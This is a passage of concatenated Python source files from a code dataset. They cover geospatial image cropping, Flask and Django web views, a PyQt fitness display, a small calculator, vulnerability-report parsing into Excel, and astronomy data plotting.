src:\n rpc_dict = src.tags(ns='RPC')\n return rpc_model.RPCModel(rpc_dict)\n\n\ndef points_apply_homography(H, pts):\n \"\"\"\n Applies an homography to a list of 2D points.\n\n Args:\n H: numpy array containing the 3x3 homography matrix\n pts: numpy array containing the list of 2D points, one per line\n\n Returns:\n a numpy array containing the list of transformed points, one per line\n \"\"\"\n pts = np.asarray(pts)\n\n # convert the input points to homogeneous coordinates\n if len(pts[0]) < 2:\n print(\"\"\"points_apply_homography: ERROR the input must be a numpy array\n of 2D points, one point per line\"\"\")\n return\n pts = np.hstack((pts[:, 0:2], pts[:, 0:1]*0+1))\n\n # apply the transformation\n Hpts = (np.dot(H, pts.T)).T\n\n # normalize the homogeneous result and trim the extra dimension\n Hpts = Hpts * (1.0 / np.tile( Hpts[:, 2], (3, 1)) ).T\n return Hpts[:, 0:2]\n\n\ndef bounding_box_of_projected_aoi(rpc, aoi, z=0, homography=None):\n \"\"\"\n Return the x, y, w, h pixel bounding box of a projected AOI.\n\n Args:\n rpc (rpc_model.RPCModel): RPC camera model\n aoi (geojson.Polygon): GeoJSON polygon representing the AOI\n z (float): altitude of the AOI with respect to the WGS84 ellipsoid\n homography (2D array, optional): matrix of shape (3, 3) representing an\n homography to be applied to the projected points before computing\n their bounding box.\n\n Return:\n x, y (ints): pixel coordinates of the top-left corner of the bounding box\n w, h (ints): pixel dimensions of the bounding box\n \"\"\"\n lons, lats = np.array(aoi['coordinates'][0]).T\n x, y = rpc.projection(lons, lats, z)\n pts = list(zip(x, y))\n if homography is not None:\n pts = points_apply_homography(homography, pts)\n return np.round(bounding_box2D(pts)).astype(int)\n\n\nclass CropOutside(Exception):\n \"\"\"\n Exception to raise when attempting to crop outside of the input image.\n \"\"\"\n pass\n\n\ndef rasterio_crop(filename, x, y, w, h, boundless=True, fill_value=0):\n \"\"\"\n Read a crop from a file with rasterio and return it as an array.\n\n This is a working alternative to this rasterio oneliner which currently fails:\n src.read(window=((y, y + h), (x, x + w)), boundless=True, fill_value=0)\n\n Args:\n filename: path to the input image file\n x, y: pixel coordinates of the top-left corner of the crop\n w, h: width and height of the crop, in pixels\n boundless (bool): similar to gdal_translate \"epo: error when partially\n outside\" flag. If False, we'll raise an exception when the\n requested crop is not entirely contained within the input image\n bounds. If True, the crop is padded with fill_value.\n fill_value (scalar): constant value used to fill pixels outside of the\n input image.\n \"\"\"\n with rasterio.open(filename, 'r') as src:\n if not boundless:\n if y < 0 or y + h > src.shape[0] or x < 0 or x + w > src.shape[1]:\n raise CropOutside(('crop {} {} {} {} falls outside of input image '\n 'whose shape is {}'.format(x, y, w, h, src.shape)))\n\n crop = fill_value * np.ones((src.count, h, w))\n y0 = max(y, 0)\n y1 = min(y + h, src.shape[0])\n x0 = max(x, 0)\n x1 = min(x + w, src.shape[1])\n crop[:, y0 - y:y1 - y, x0 - x:x1 - x] = src.read(window=((y0, y1), (x0, x1)))\n\n # interleave channels\n return np.moveaxis(crop, 0, 2).squeeze()\n\n\ndef crop_aoi(geotiff, aoi, z=0):\n \"\"\"\n Crop a geographic AOI in a georeferenced image using its RPC functions.\n\n Args:\n geotiff (string): path or url to the input GeoTIFF image file\n aoi (geojson.Polygon): GeoJSON polygon representing the AOI\n z (float, optional): base altitude with respect to WGS84 ellipsoid (0\n by default)\n\n Return:\n crop (array): numpy array containing the cropped image\n x, y, w, h (ints): image coordinates of the crop. x, y are the\n coordinates of the top-left corner, while w, h are the dimensions\n of the crop.\n \"\"\"\n x, y, w, h = bounding_box_of_projected_aoi(rpc_from_geotiff(geotiff), aoi, z)\n return rasterio_crop(geotiff, x, y, w, h), x, y\n\n\ndef rio_dtype(numpy_dtype):\n \"\"\"\n Convert a numpy datatype to a rasterio datatype.\n \"\"\"\n if numpy_dtype == 'bool':\n return rasterio.dtypes.bool_\n elif numpy_dtype == 'uint8':\n return rasterio.dtypes.uint8\n elif numpy_dtype == 'uint16':\n return rasterio.dtypes.uint16\n elif numpy_dtype == 'int16':\n return rasterio.dtypes.int16\n elif numpy_dtype == 'uint32':\n return rasterio.dtypes.uint32\n elif numpy_dtype == 'int32':\n return rasterio.dtypes.int32\n elif numpy_dtype == 'float32':\n return rasterio.dtypes.float32\n elif numpy_dtype == 'float64':\n return rasterio.dtypes.float64\n elif numpy_dtype == 'complex':\n return rasterio.dtypes.complex_\n elif numpy_dtype == 'complex64':\n return rasterio.dtypes.complex64\n elif numpy_dtype == 'complex128':\n return rasterio.dtypes.complex128\n\n\ndef rio_write(path, array, profile={}, tags={}, namespace_tags={}):\n \"\"\"\n Write a numpy array in a tiff/png/jpeg file with rasterio.\n\n Args:\n path: path to the output tiff/png/jpeg file\n array: 2D or 3D numpy array containing the image to write\n profile: rasterio profile (ie dictionary of metadata)\n tags: dictionary of additional geotiff tags\n namespace_tags: dictionary of dictionaries of additional geotiff tags\n (e.g. IMAGE_STRUCTURE, RPC, SUBDATASETS)\n \"\"\"\n # read image size and number of bands\n if array.ndim > 2:\n height, width, nbands = array.shape\n else:\n nbands = 1\n height, width = array.shape\n\n # determine the driver based on the file extension\n extension = os.path.splitext(path)[1].lower()\n if extension in ['.tif', '.tiff']:\n driver = 'GTiff'\n elif extension in ['.jpg', '.jpeg']:\n driver = 'jpeg'\n elif extension in ['.png']:\n driver = 'png'\n else:\n print('ERROR: unknown extension {}'.format(extension))\n\n with warnings.catch_warnings(): # noisy may occur here\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\n profile.update(driver=driver, count=nbands, width=width, height=height,\n dtype=rio_dtype(array.dtype), quality=100)\n with rasterio.open(path, 'w', **profile) as dst:\n if array.ndim > 2:\n dst.write(np.moveaxis(array, 2, 0))\n else:\n dst.write(np.array([array]))\n dst.update_tags(**tags)\n for k, v in namespace_tags.items():\n dst.update_tags(ns=k, **v)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"258438480","text":"from application import app\nfrom application.headers import get_headers\nfrom application.logformat import format_message\nfrom application.http import http_put\nfrom flask import Response, request, render_template, session, redirect, url_for\nfrom datetime import datetime\nimport logging\nimport json\n\n\ndef build_lc_inputs(data):\n result = {'class': '', 'county': [], 'district': '', 'short_description': '',\n 'estate_owner': {'private': {'forenames': [], 'surname': ''},\n 'company': '',\n 'local': {'name': '', 'area': ''},\n 'complex': {\"name\": '', \"number\": ''},\n 'other': ''},\n 'estate_owner_ind': 'Private Individual',\n 'occupation': '',\n 'additional_info': '',\n 'priority_notice': ''}\n\n if len(data) > 0:\n result['class'] = data['class']\n\n result['district'] = data['district']\n result['short_description'] = data['short_desc']\n\n result['estate_owner_ind'] = get_eo_ind(data['estateOwnerTypes'])\n\n result['occupation'] = data['occupation']\n if \"addl_info\" in data:\n result['additional_info'] = data['addl_info']\n if 'priority_notice' in data:\n result['priority_notice'] = data['priority_notice']\n\n add_counties(result, data)\n\n add_estate_owner_details(result, data)\n return result\n\n\ndef get_eo_ind(eo_type_string):\n if eo_type_string.lower() == \"privateindividual\":\n return \"Private Individual\"\n elif eo_type_string.lower() == \"countycouncil\":\n return \"County Council\"\n elif eo_type_string.lower() == \"ruralcouncil\":\n return \"Rural Council\"\n elif eo_type_string.lower() == \"parishcouncil\":\n return \"Parish Council\"\n elif eo_type_string.lower() == \"othercouncil\":\n return \"Other Council\"\n elif eo_type_string.lower() == \"developmentcorporation\":\n return \"Development Corporation\"\n elif eo_type_string.lower() == \"limitedcompany\":\n return \"Limited Company\"\n elif eo_type_string.lower() == \"complexname\":\n return \"Complex Name\"\n elif eo_type_string.lower() == \"codedname\":\n return \"Coded Name\"\n elif eo_type_string.lower() == \"other\":\n return \"Other\"\n else:\n raise RuntimeError(\"Unrecognised estate owner: {}\".format(eo_type_string))\n\n\ndef add_estate_owner_details(result, data):\n result['estate_owner']['private']['forenames'] = data['forename'].split(' ')\n result['estate_owner']['private']['surname'] = data['surname']\n\n result['estate_owner']['company'] = data['company']\n result['estate_owner']['local']['name'] = data['loc_auth']\n result['estate_owner']['local']['area'] = data['loc_auth_area']\n result['estate_owner']['complex']['name'] = data['complex_name']\n\n if data['complex_number'] == \"\":\n result['estate_owner']['complex']['number'] = 0\n else:\n result['estate_owner']['complex']['number'] = int(data['complex_number'])\n\n result['estate_owner']['other'] = data['other_name']\n\n\ndef add_counties(result, data):\n counter = 0\n counties = []\n while True:\n county_counter = \"county_\" + str(counter)\n if county_counter in data and data[county_counter] != '':\n counties.append(data[county_counter])\n logging.debug('Add county ' + data[county_counter])\n else:\n break\n counter += 1\n\n result['county'] = counties\n\n\ndef build_customer_fee_inputs(data):\n cust_address = data['customer_address'].replace(\"\\r\\n\", \", \").strip()\n customer_fee_details = {'key_number': data['key_number'],\n 'customer_name': data['customer_name'],\n 'customer_address': cust_address,\n 'address_type': data['address_type'],\n 'application_reference': data['customer_ref'],\n 'payment': data['payment']}\n\n return customer_fee_details\n\n\ndef submit_lc_registration(cust_fee_data):\n application = session['application_dict']\n application['class_of_charge'] = convert_application_type(session['application_type'])\n application['application_ref'] = cust_fee_data['application_reference']\n application['key_number'] = cust_fee_data['key_number']\n application['customer_name'] = cust_fee_data['customer_name']\n application['customer_address'] = cust_fee_data['customer_address']\n application['address_type'] = cust_fee_data['address_type']\n today = datetime.now().strftime('%Y-%m-%d')\n application['date'] = today\n application['residence_withheld'] = False\n #application['date_of_birth'] = \"1980-01-01\" # DONE?: what are we doing about the DOB??\n application['document_id'] = session['document_id']\n application['fee_details'] = {'type': cust_fee_data['payment'],\n 'fee_factor': 1,\n 'delivery': session['application_dict']['delivery_method']}\n\n if session['application_dict']['form'] == 'K6':\n application['priority_notice_ind'] = True\n result_string = 'priority_notices'\n else:\n result_string = 'new_registrations'\n\n session['register_details']['estate_owner']['estate_owner_ind'] = session['register_details']['estate_owner_ind']\n # convert_estate_owner_ind(session['register_details']['estate_owner_ind'])\n application['lc_register_details'] = session['register_details']\n\n url = app.config['CASEWORK_API_URL'] + '/applications/' + session['worklist_id'] + '?action=complete'\n headers = get_headers({'Content-Type': 'application/json'})\n response = http_put(url, data=json.dumps(application), headers=headers)\n if response.status_code == 200:\n logging.info(format_message(\"Registration submitted to CASEWORK_API\"))\n data = response.json()\n reg_list = []\n\n for item in data[result_string]:\n reg_list.append(item['number'])\n session['confirmation'] = {'reg_no': reg_list}\n\n return response\n\n\ndef convert_application_type(type):\n app_type = {\n \"lc_regn\": \"New Registration\",\n \"banks\": \"New Registration\",\n \"cancel\": \"Cancellation\",\n \"amend\": \"Amendment\",\n \"oc\": \"Official Copy\",\n \"search\": \"Search\"\n }\n\n return app_type.get(type)\n","sub_path":"application/land_charge.py","file_name":"land_charge.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"474151665","text":"# coding=utf-8\nimport json\nimport requests\nfrom requests.exceptions import HTTPError\nfrom braces.views import LoginRequiredMixin\nfrom rest_framework.views import APIView, Response\n\nfrom bims.location_site.river import fetch_river_name\nfrom bims.utils.get_key import get_key\nfrom bims.location_site.river import generate_site_code\nfrom bims.models.location_site import LocationSite\n\n\nclass GetSiteCode(LoginRequiredMixin, APIView):\n\n def get(self, request):\n lat = request.GET.get('lat', None)\n lon = request.GET.get('lon', None)\n site_id = request.GET.get('site_id', None)\n location_site = None\n if site_id:\n try:\n location_site = LocationSite.objects.get(\n id=site_id\n )\n except LocationSite.DoesNotExist:\n pass\n\n catchment = ''\n secondary_catchment_area = ''\n\n river_name = fetch_river_name(lat, lon)\n\n catchment_url = (\n '{base_url}/api/v1/geocontext/value/group/'\n '{lon}/{lat}/river_catchment_areas_group/'\n ).format(\n base_url=get_key('GEOCONTEXT_URL'),\n lon=lon,\n lat=lat\n )\n\n try:\n response = requests.get(catchment_url)\n if response.status_code == 200:\n catchment = json.loads(response.content)\n secondary_catchment_area = (\n catchment['service_registry_values'][1][\n 'value']\n )\n except (HTTPError, ValueError, KeyError):\n pass\n\n return Response({\n 'river': river_name,\n 'catchment': catchment,\n 'site_code': generate_site_code(\n river_name=river_name,\n catchment=secondary_catchment_area,\n location_site=location_site\n )\n })\n","sub_path":"bims/api_views/site_code.py","file_name":"site_code.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"236129941","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('web.views',\n\t#\turl(r'^$','index_view',name='vista_principal'),\n\t#\turl(r'^about/$','about_view',name='vista_about'),\n\n\t\turl(r'^$','index',name='home'),\n\n\n\t\turl(r'^addCiudad/$','addCiudad',name='addCiudad'),\n\t\turl(r'^addPlan/$','addPlan',name='addPlan'),\n\t\turl(r'^addServicio/$','addServicio',name='addServicio'),\t\n\t\turl(r'^addTitular/$','addTitular',name='addTitular'),\n\t\turl(r'^addParentesco/$','addParentesco',name='addParentesco'),\n\t\turl(r'^cargo/$','Cargo',name='cargo'),\n\t\turl(r'^addPS/$','addPS',name='addPS'),\n\n\n\t\turl(r'^usuarios/$', 'usuario', name='usuarios'),\n \turl(r'^login/$', 'sesion', name='login'),\n\t \turl(r'^salir/$', 'salir', name='salir'),\n\n\n\t\turl(r'^addBarrio/$','addBarrio',name='addBarrio'),\n\t\turl(r'^addAfiliado/$','addAfiliado',name='addAfiliado'),\n\t\turl(r'^addCobro/$','addCobro',name='addCobro'),\n\t\turl(r'^consultarEmpleado/$','consultarE',name='consultarEmpleado'),\n\t\turl(r'^consultarTitular/$','consultarT',name='consultarTitular'),\n\t\turl(r'^consultarCobro/$','consultarC',name='consultarCobro'),\n\n\n\t\t\n)\n","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293798529","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nimport numpy as np\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.animation as animation\nfrom threading import Timer\nimport subprocess\n\n\nfile_off = open(\"STEP_offset.txt\", 'w')\nfile_off.write(\"0\")\nfile_off.close()\n\nfile = open(\"STEP_output.txt\", 'w')\nfile.write(\"0\")\nfile.close()\n\n\nclass MyMplCanvas(FigureCanvas):\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n \n self.axes = fig.add_subplot(111, xlim=(0, 100), ylim=(0, 200))\n self.axes.set_title(\"BPM\", fontsize = 30) # BPM font size\n self.compute_initial_figure()\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n def compute_initial_figure(self):\n pass\n\nclass AnimationWidget(QWidget):\n def __init__(self):\n QMainWindow.__init__(self)\n vbox = QVBoxLayout()\n self.canvas = MyMplCanvas(self, width=10, height=8, dpi=100)\n\n self.BPM_button = QPushButton(\"BPM 받기\", self)\n self.STEP_button = QPushButton(\"STEP 받기\", self)\n self.LOCK_button = QPushButton(\"LOCK\", self)\n\n self.BPM_button.setMinimumWidth(2)\n self.STEP_button.setMinimumWidth(2)\n self.LOCK_button.setMinimumWidth(2)\n\n self.BPM_button.clicked.connect(self.on_BPM)\n self.STEP_button.clicked.connect(self.on_STEP)\n self.LOCK_button.clicked.connect(self.on_LOCK)\n\n vbox3 = QVBoxLayout()\n vbox3.addWidget(self.BPM_button)\n vbox3.addWidget(self.STEP_button)\n vbox3.addWidget(self.LOCK_button)\n\n self.label2 = QLabel('REWARD BOX', self)\n self.label2.setAlignment(Qt.AlignCenter)\n font2 = self.label2.font()\n font2.setPointSize(20) # REWARDBOX font size\n self.label2.setFont(font2)\n\n self.label1 = QLabel('STEP:', self)\n self.label1.setAlignment(Qt.AlignRight) #STEP font alignment\n font1 = self.label1.font()\n font1.setPointSize(30) #STEP font size\n self.label1.setFont(font1)\n\n self.stepNumber = QLCDNumber(self)\n self.stepNumber.setDigitCount(3) #STEP number digit 자리수\n self.stepNumber.setMinimumHeight(30) #STEP number 크기\n\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.label2, Qt.AlignCenter)\n hbox2.addLayout(vbox3)\n vbox.addLayout(hbox2)\n vbox.addWidget(self.canvas)\n\n hbox1 = QHBoxLayout()\n hbox1.addWidget(self.label1)\n hbox1.addWidget(self.stepNumber, Qt.AlignCenter) #STEP digit alignment\n vbox.addLayout(hbox1)\n hbox = QHBoxLayout()\n self.start_button = QPushButton(\"start\", self)\n self.reset_button = QPushButton(\"reset\", self)\n self.stop_button = QPushButton(\"stop\", self)\n\n self.start_button.setMinimumHeight(50)\n self.reset_button.setMinimumHeight(50)\n self.stop_button.setMinimumHeight(50)\n\n self.start_button.clicked.connect(self.on_start)\n self.reset_button.clicked.connect(self.on_reset)\n self.stop_button.clicked.connect(self.on_stop)\n hbox.addWidget(self.start_button)\n hbox.addWidget(self.reset_button)\n hbox.addWidget(self.stop_button)\n vbox.addLayout(hbox)\n self.setLayout(vbox)\n\n self.x = np.arange(100)\n self.y = np.ones(100, dtype=np.float)*np.nan\n self.line, = self.canvas.axes.plot(self.x, self.y, animated=True, lw=2)\n \n self.showStepNum()\n\n \n def update_line(self, i):\n file = open(\"BPM_output.txt\", 'r')\n data = file.read()\n try:\n y = float(data)\n old_y = self.line.get_ydata()\n new_y = np.r_[old_y[1:], y]\n self.line.set_ydata(new_y)\n \n except:\n pass\n \n return [self.line]\n # self.line.set_ydata(y)\n \n\n \n def on_start(self):\n self.ani = animation.FuncAnimation(self.canvas.figure, self.update_line,blit=True, interval=25)\n\n def on_reset(self):\n file = open(\"STEP_output.txt\", 'r')\n data = file.read()\n file_off = open(\"STEP_offset.txt\", 'w')\n file_off.write(data)\n file_off.close()\n\n def on_stop(self):\n self.ani._stop()\n\n def on_BPM(self):\n subprocess.call([\"python\", \"bpm_subscriber.py\"])\n\n def on_STEP(self):\n subprocess.call([\"python\", \"step_subscriber.py\"])\n\n def on_LOCK(self):\n subprocess.call([\"python\", \"LOCK.py\"])\n\n def showStepNum(self):\n file = open(\"STEP_output.txt\", 'r')\n file_off = open(\"STEP_offset.txt\", 'r')\n data = file.read()\n offset = file_off.read()\n offset_int = int(offset)\n print(data)\n try:\n step = int(data)\n step = step - offset_int\n self.stepNumber.display(step)\n except:\n pass\n timer = Timer(1, self.showStepNum)\n timer.start()\n\n\nif __name__ == \"__main__\":\n qApp = QApplication(sys.argv)\n aw = AnimationWidget()\n aw.show()\n sys.exit(qApp.exec_())","sub_path":"CJ_rewardBOX/backup/GUIscreen1_01121234.py","file_name":"GUIscreen1_01121234.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"427350806","text":"import re\n\nprint(\"Gods amazing calculator\")\nprint(\"Type quit to exit\\n\")\n\nprevious = 0\nrun = True\n\n\ndef perform_math(): # use pep8 snake_case\n global run\n global previous\n equation = \" \"\n if previous == 0:\n equation = input(\"Enter equation:\")\n else:\n equation = input(str(previous))\n\n if equation == \"quit\":\n print(\"Goodbye\")\n run = False\n else:\n equation = re.sub('[a-zA-Z,.:()\"]', \",\", equation) #omit the characters you don't want the user to use\n if previous == 0:\n previous = eval(equation)\n else:\n previous = eval(str(previous) + equation)\n\nwhile run:\n performMath()\n","sub_path":"simpleCalculator.py","file_name":"simpleCalculator.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267925720","text":"import re\nfrom functools import partial\n\nimport six\n\nfrom nose import SkipTest\n# Gets us eq_, ok_, etc\nfrom nose.tools import *\n\nfrom spec.plugin import SpecPlugin\nfrom spec.cli import main\nfrom spec.utils import InnerClassParser, hide\nfrom spec.trap import trap\n\n\nclass Spec(six.with_metaclass(InnerClassParser, object)):\n \"\"\"\n Parent class for spec classes wishing to use inner class contexts.\n \"\"\"\n\n\n# Simple helper\ndef skip():\n raise SkipTest\n\n\n# Multiline string comparison helper ripped from Fabric 1.x\ndef eq_(result, expected, msg=None):\n \"\"\"\n Shadow of the Nose builtin which presents easier to read multiline output.\n \"\"\"\n params = {'expected': expected, 'result': result}\n aka = \"\"\"\n\n--------------------------------- aka -----------------------------------------\n\nExpected:\n%(expected)r\n\nGot:\n%(result)r\n\"\"\" % params\n default_msg = \"\"\"\nExpected:\n%(expected)s\n\nGot:\n%(result)s\n\"\"\" % params\n if (repr(result) != str(result)) or (repr(expected) != str(expected)):\n default_msg += aka\n assert result == expected, msg or default_msg\n\n\ndef _assert_contains(haystack, needle, invert, escape=False):\n \"\"\"\n Test for existence of ``needle`` regex within ``haystack``.\n\n Say ``escape`` to escape the ``needle`` if you aren't really using the\n regex feature & have special characters in it.\n \"\"\"\n myneedle = re.escape(needle) if escape else needle\n matched = re.search(myneedle, haystack, re.M)\n if (invert and matched) or (not invert and not matched):\n raise AssertionError(\"'%s' %sfound in '%s'\" % (\n needle,\n \"\" if invert else \"not \",\n haystack\n ))\n\nassert_contains = partial(_assert_contains, invert=False)\nassert_not_contains = partial(_assert_contains, invert=True)\n","sub_path":"spec/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485946251","text":"# -*- coding: utf-8 -*-\n#from Crypto.Cipher import AES\n#import base64\nimport requests\nimport xlwt\nfrom bs4 import BeautifulSoup\n\nstyleh = xlwt.easyxf('font: name Times New Roman, color-index red, bold on')\nstylem = xlwt.easyxf('font: name Times New Roman, color-index orange, bold on')\nstylen = xlwt.easyxf('font: name Times New Roman, color-index black, bold on')\n\n\ndef getip(url):\n index = requests.get(url)\n i= BeautifulSoup(index.content,'lxml')\n iplist=i.find_all(\"img\",{ \"title\" : \"非常危险\" })\n ipall=[]\n for i in iplist:\n u=i.find_next_sibling('a')\n if u==None:\n continue\n ipall.append(u.getText())\n return ipall\n\ndef genexcel(ip):\n wbk = xlwt.Workbook(style_compression=2)\n ws = wbk.add_sheet('sheet 1',cell_overwrite_ok=True)\n n=0\n for i in ip:\n host = requests.get('http://172.20.45.115/host/%s.html'%i)\n d = BeautifulSoup(host.content, 'lxml')\n listh=d.find(id='vul_detail').find_all(\"span\",{ \"class\" : \"level_danger_high\" })\n lh=[link.string for link in listh]\n listm=d.find(id='vul_detail').find_all(\"span\",{ \"class\" : \"level_danger_middle\" })\n lm=[link.string for link in listm]\n print (lm)\n lenall = len(lh) + len(lm)\n ws.write_merge(n, n + lenall-1, 1, 1, i,stylen)\n for index,text in enumerate(lh,start=n):\n ws.write(index, 0, text, styleh)\n for index,text in enumerate(lm,start=n+len(lh)):\n print (index)\n ws.write(index, 0, text, stylem)\n n = n + lenall\n wbk.save('test.xls')\n\ngenexcel(getip(\"http://172.20.45.115/index.html\"))","sub_path":"lvmeng/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"179066728","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n n = 0\n res = []\n l = max(len(a), len(b)) + 1\n for i in range(1, l):\n aa = a[-i] if (len(a) - i >= 0) else 0\n bb = b[-i] if (len(b) - i >= 0) else 0\n s = int(aa) + int(bb) + n\n print(f\"{aa} + {bb} + {n} = {s} ({n})\")\n if (s == 2):\n s = 0\n n = 1\n elif (s == 3): \n s = 1\n n = 1\n else:\n n = 0\n res.insert(0, str(s))\n if (n == 1): res.insert(0, '1')\n return ''.join(res)\n\ns = Solution()\nres = s.addBinary(\"1111\", \"1111\")\n# res = s.addBinary(\"1010\", \"1011\")\nprint(res)\n\n# class Solution:\n# def addBinary(self, a: str, b: str) -> str:\n# n = 0\n# res = []\n# for i in range(1, min(len(a), len(b)) + 1):\n# if (int(a[-i]) + int(b[-i]) + n > 1):\n# s = 0\n# n = 1\n# else:\n# s = int(a[-i]) + int(b[-i]) + n\n# n = 0\n# print(f\"{a[-i]} + {b[-i]} + {n} = {s} ({n})\")\n# res.insert(0, s)\n# if (n == 1): res.insert(0, n)\n# return res \n","sub_path":"lc/python3/67-add-binary.py","file_name":"67-add-binary.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73177243","text":"#Fibonacci - joao pedro garcia pereira\n#Declaracao de variaveis\ncont=0\nfib=1\naux=1\naux2=0\nn=int(input(\"Insert a number for fibonacci: \"))\n#Processamento\nwhile cont 5.] = 0\n super(PlotableNormFlat, self).plot(subplot, title, tooltip)\n\nclass PlotableRawFlat (PlotableFlat) :\n def __init__(self, fits_flat_raw, fits_master_flat, fits_slittrace):\n super(PlotableRawFlat, self).__init__(fits_flat_raw, fits_slittrace)\n if self.slittrace is not None and fits_master_flat is not None :\n master_flat = PipelineProduct(fits_master_flat)\n self.trimm_lly = master_flat.all_hdu[0].header.get('HIERARCH ESO QC TRIMM LLY')\n\n #Change the traces by the amount of overscan in Y that has been removed\n for ypos_top in self.ypos_top_traces:\n for j, ypos in enumerate(ypos_top):\n ypos_top[j] = ypos + self.trimm_lly - 1\n for ypos_bottom in self.ypos_bottom_traces:\n for j, ypos in enumerate(ypos_bottom):\n ypos_bottom[j] = ypos + self.trimm_lly -1\n \n\n def plot(self, subplot, title, tooltip):\n super(PlotableRawFlat, self).plot(subplot, title, tooltip)\n\nclass PlotableSpatialMap :\n def __init__(self, fits_spatialmap):\n self.spatialmap = PipelineProduct(fits_spatialmap)\n self.spatialmapdisp = ImageDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the flat image\n self.spatialmap.readImage()\n\n def plot(self, subplot, title, tooltip):\n self.spatialmapdisp.setLabels('X', 'Y')\n self.spatialmapdisp.setZLimits((0., 100))\n self.spatialmapdisp.display(subplot, title, tooltip, self.spatialmap.image)\n\nclass PlotableMappedScience :\n def __init__(self, fits_mappedscience, fits_objecttable):\n self.mappedscience = PipelineProduct(fits_mappedscience)\n self.mappedsciencedisp = ImageDisplay()\n if fits_objecttable is not None:\n self.objecttable = PipelineProduct(fits_objecttable)\n else :\n self.objecttable = None\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the flat image\n self.mappedscience.readImage()\n \n #Reading the object table\n if self.objecttable is not None:\n nslit = self.objecttable.getTableNrows(1)\n maxobjectperslit = (self.objecttable.getTableNcols(1) - 7 ) / 4\n start_extracted_cols = []\n end_extracted_cols = []\n for obj in range(maxobjectperslit):\n colname = 'start_%d'%(obj+1)\n self.objecttable.readTableColumn(1, colname)\n start_extracted_cols.append(self.objecttable.column)\n colname = 'end_%d'%(obj+1)\n self.objecttable.readTableColumn(1, colname)\n end_extracted_cols.append(self.objecttable.column)\n\n self.ybottom_obj_extract = []\n self.ytop_obj_extract = []\n for slit in range(nslit) :\n for obj in range(maxobjectperslit) :\n ybottom = start_extracted_cols[obj][slit]\n ytop = end_extracted_cols[obj][slit]\n if ybottom != -1 :\n self.ybottom_obj_extract.append(ybottom)\n self.ytop_obj_extract.append(ytop)\n self.nobjects = len(self.ybottom_obj_extract)\n\n def plot(self, subplot, title, tooltip):\n self.mappedsciencedisp.setLabels('X [pix]', 'Y [pix]')\n self.mappedsciencedisp.setZLimits((0., 0.9))\n self.mappedsciencedisp.display(subplot, title, tooltip, self.mappedscience.image)\n if self.objecttable is not None:\n subplot.autoscale(enable=False)\n for obj in range(self.nobjects) :\n subplot.axhline(self.ytop_obj_extract[obj], linestyle='solid',color='red')\n subplot.axhline(self.ybottom_obj_extract[obj], linestyle='solid',color='yellow')\n \n def getObjectInPosition(self, ypos) :\n for obj in range(self.nobjects) :\n if ypos > self.ybottom_obj_extract[obj] and \\\n ypos < self.ytop_obj_extract[obj] :\n return self.nobjects - obj\n return -1\n\nclass PlotableDispResiduals :\n def __init__(self, fits_dispresiduals):\n self.dispresiduals = PipelineProduct(fits_dispresiduals)\n self.resdisplay = ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the residuals table\n self.dispresiduals.readTableColumn(1, 'wavelength')\n self.wave = self.dispresiduals.column\n nwave = self.dispresiduals.getTableNrows(1)\n ncolumns = self.dispresiduals.getTableNcols(1)\n nselectedrows = (ncolumns - 1) // 3\n self.residuals = []\n self.allwave = []\n self.allypos = []\n self.allresiduals = []\n for i in range(nselectedrows) :\n #TODO: Currently the residuals are computed every 10 rows. \n #This is hard-coded in the pipeline. It would be better just to detect the\n #columns whose name start with 'r' \n colname = 'r%d'%(i*10) \n self.dispresiduals.readTableColumn(1, colname)\n row_residuals = self.dispresiduals.column\n self.residuals.append(row_residuals)\n self.allwave.extend(self.wave)\n self.allresiduals.extend(row_residuals)\n ypos = i*10.\n self.allypos.extend([ypos] * nwave)\n\n def plotResVsWave(self, subplot, title, tooltip):\n self.resdisplay.setLabels('Wavelength [Ang]','Residual [pix]')\n self.resdisplay.display(subplot, title, tooltip, self.allwave,\n self.allresiduals)\n\n def plotResVsY(self, subplot, title, tooltip):\n self.resdisplay.setLabels('Ypos [pix]','Residual [pix]')\n self.resdisplay.display(subplot, title, tooltip, self.allypos,\n self.allresiduals)\n def getClosestLine(self, wave_selected) :\n \n distance = numpy.fabs(self.wave - wave_selected)\n idx = numpy.nanargmin(distance)\n return self.wave[idx]\n\nclass PlotableDetectedLines :\n def __init__(self, fits_detectedlines):\n self.detectedlines = PipelineProduct(fits_detectedlines)\n self.xydisplay = ScatterDisplay()\n self.resdisplay = ScatterDisplay()\n 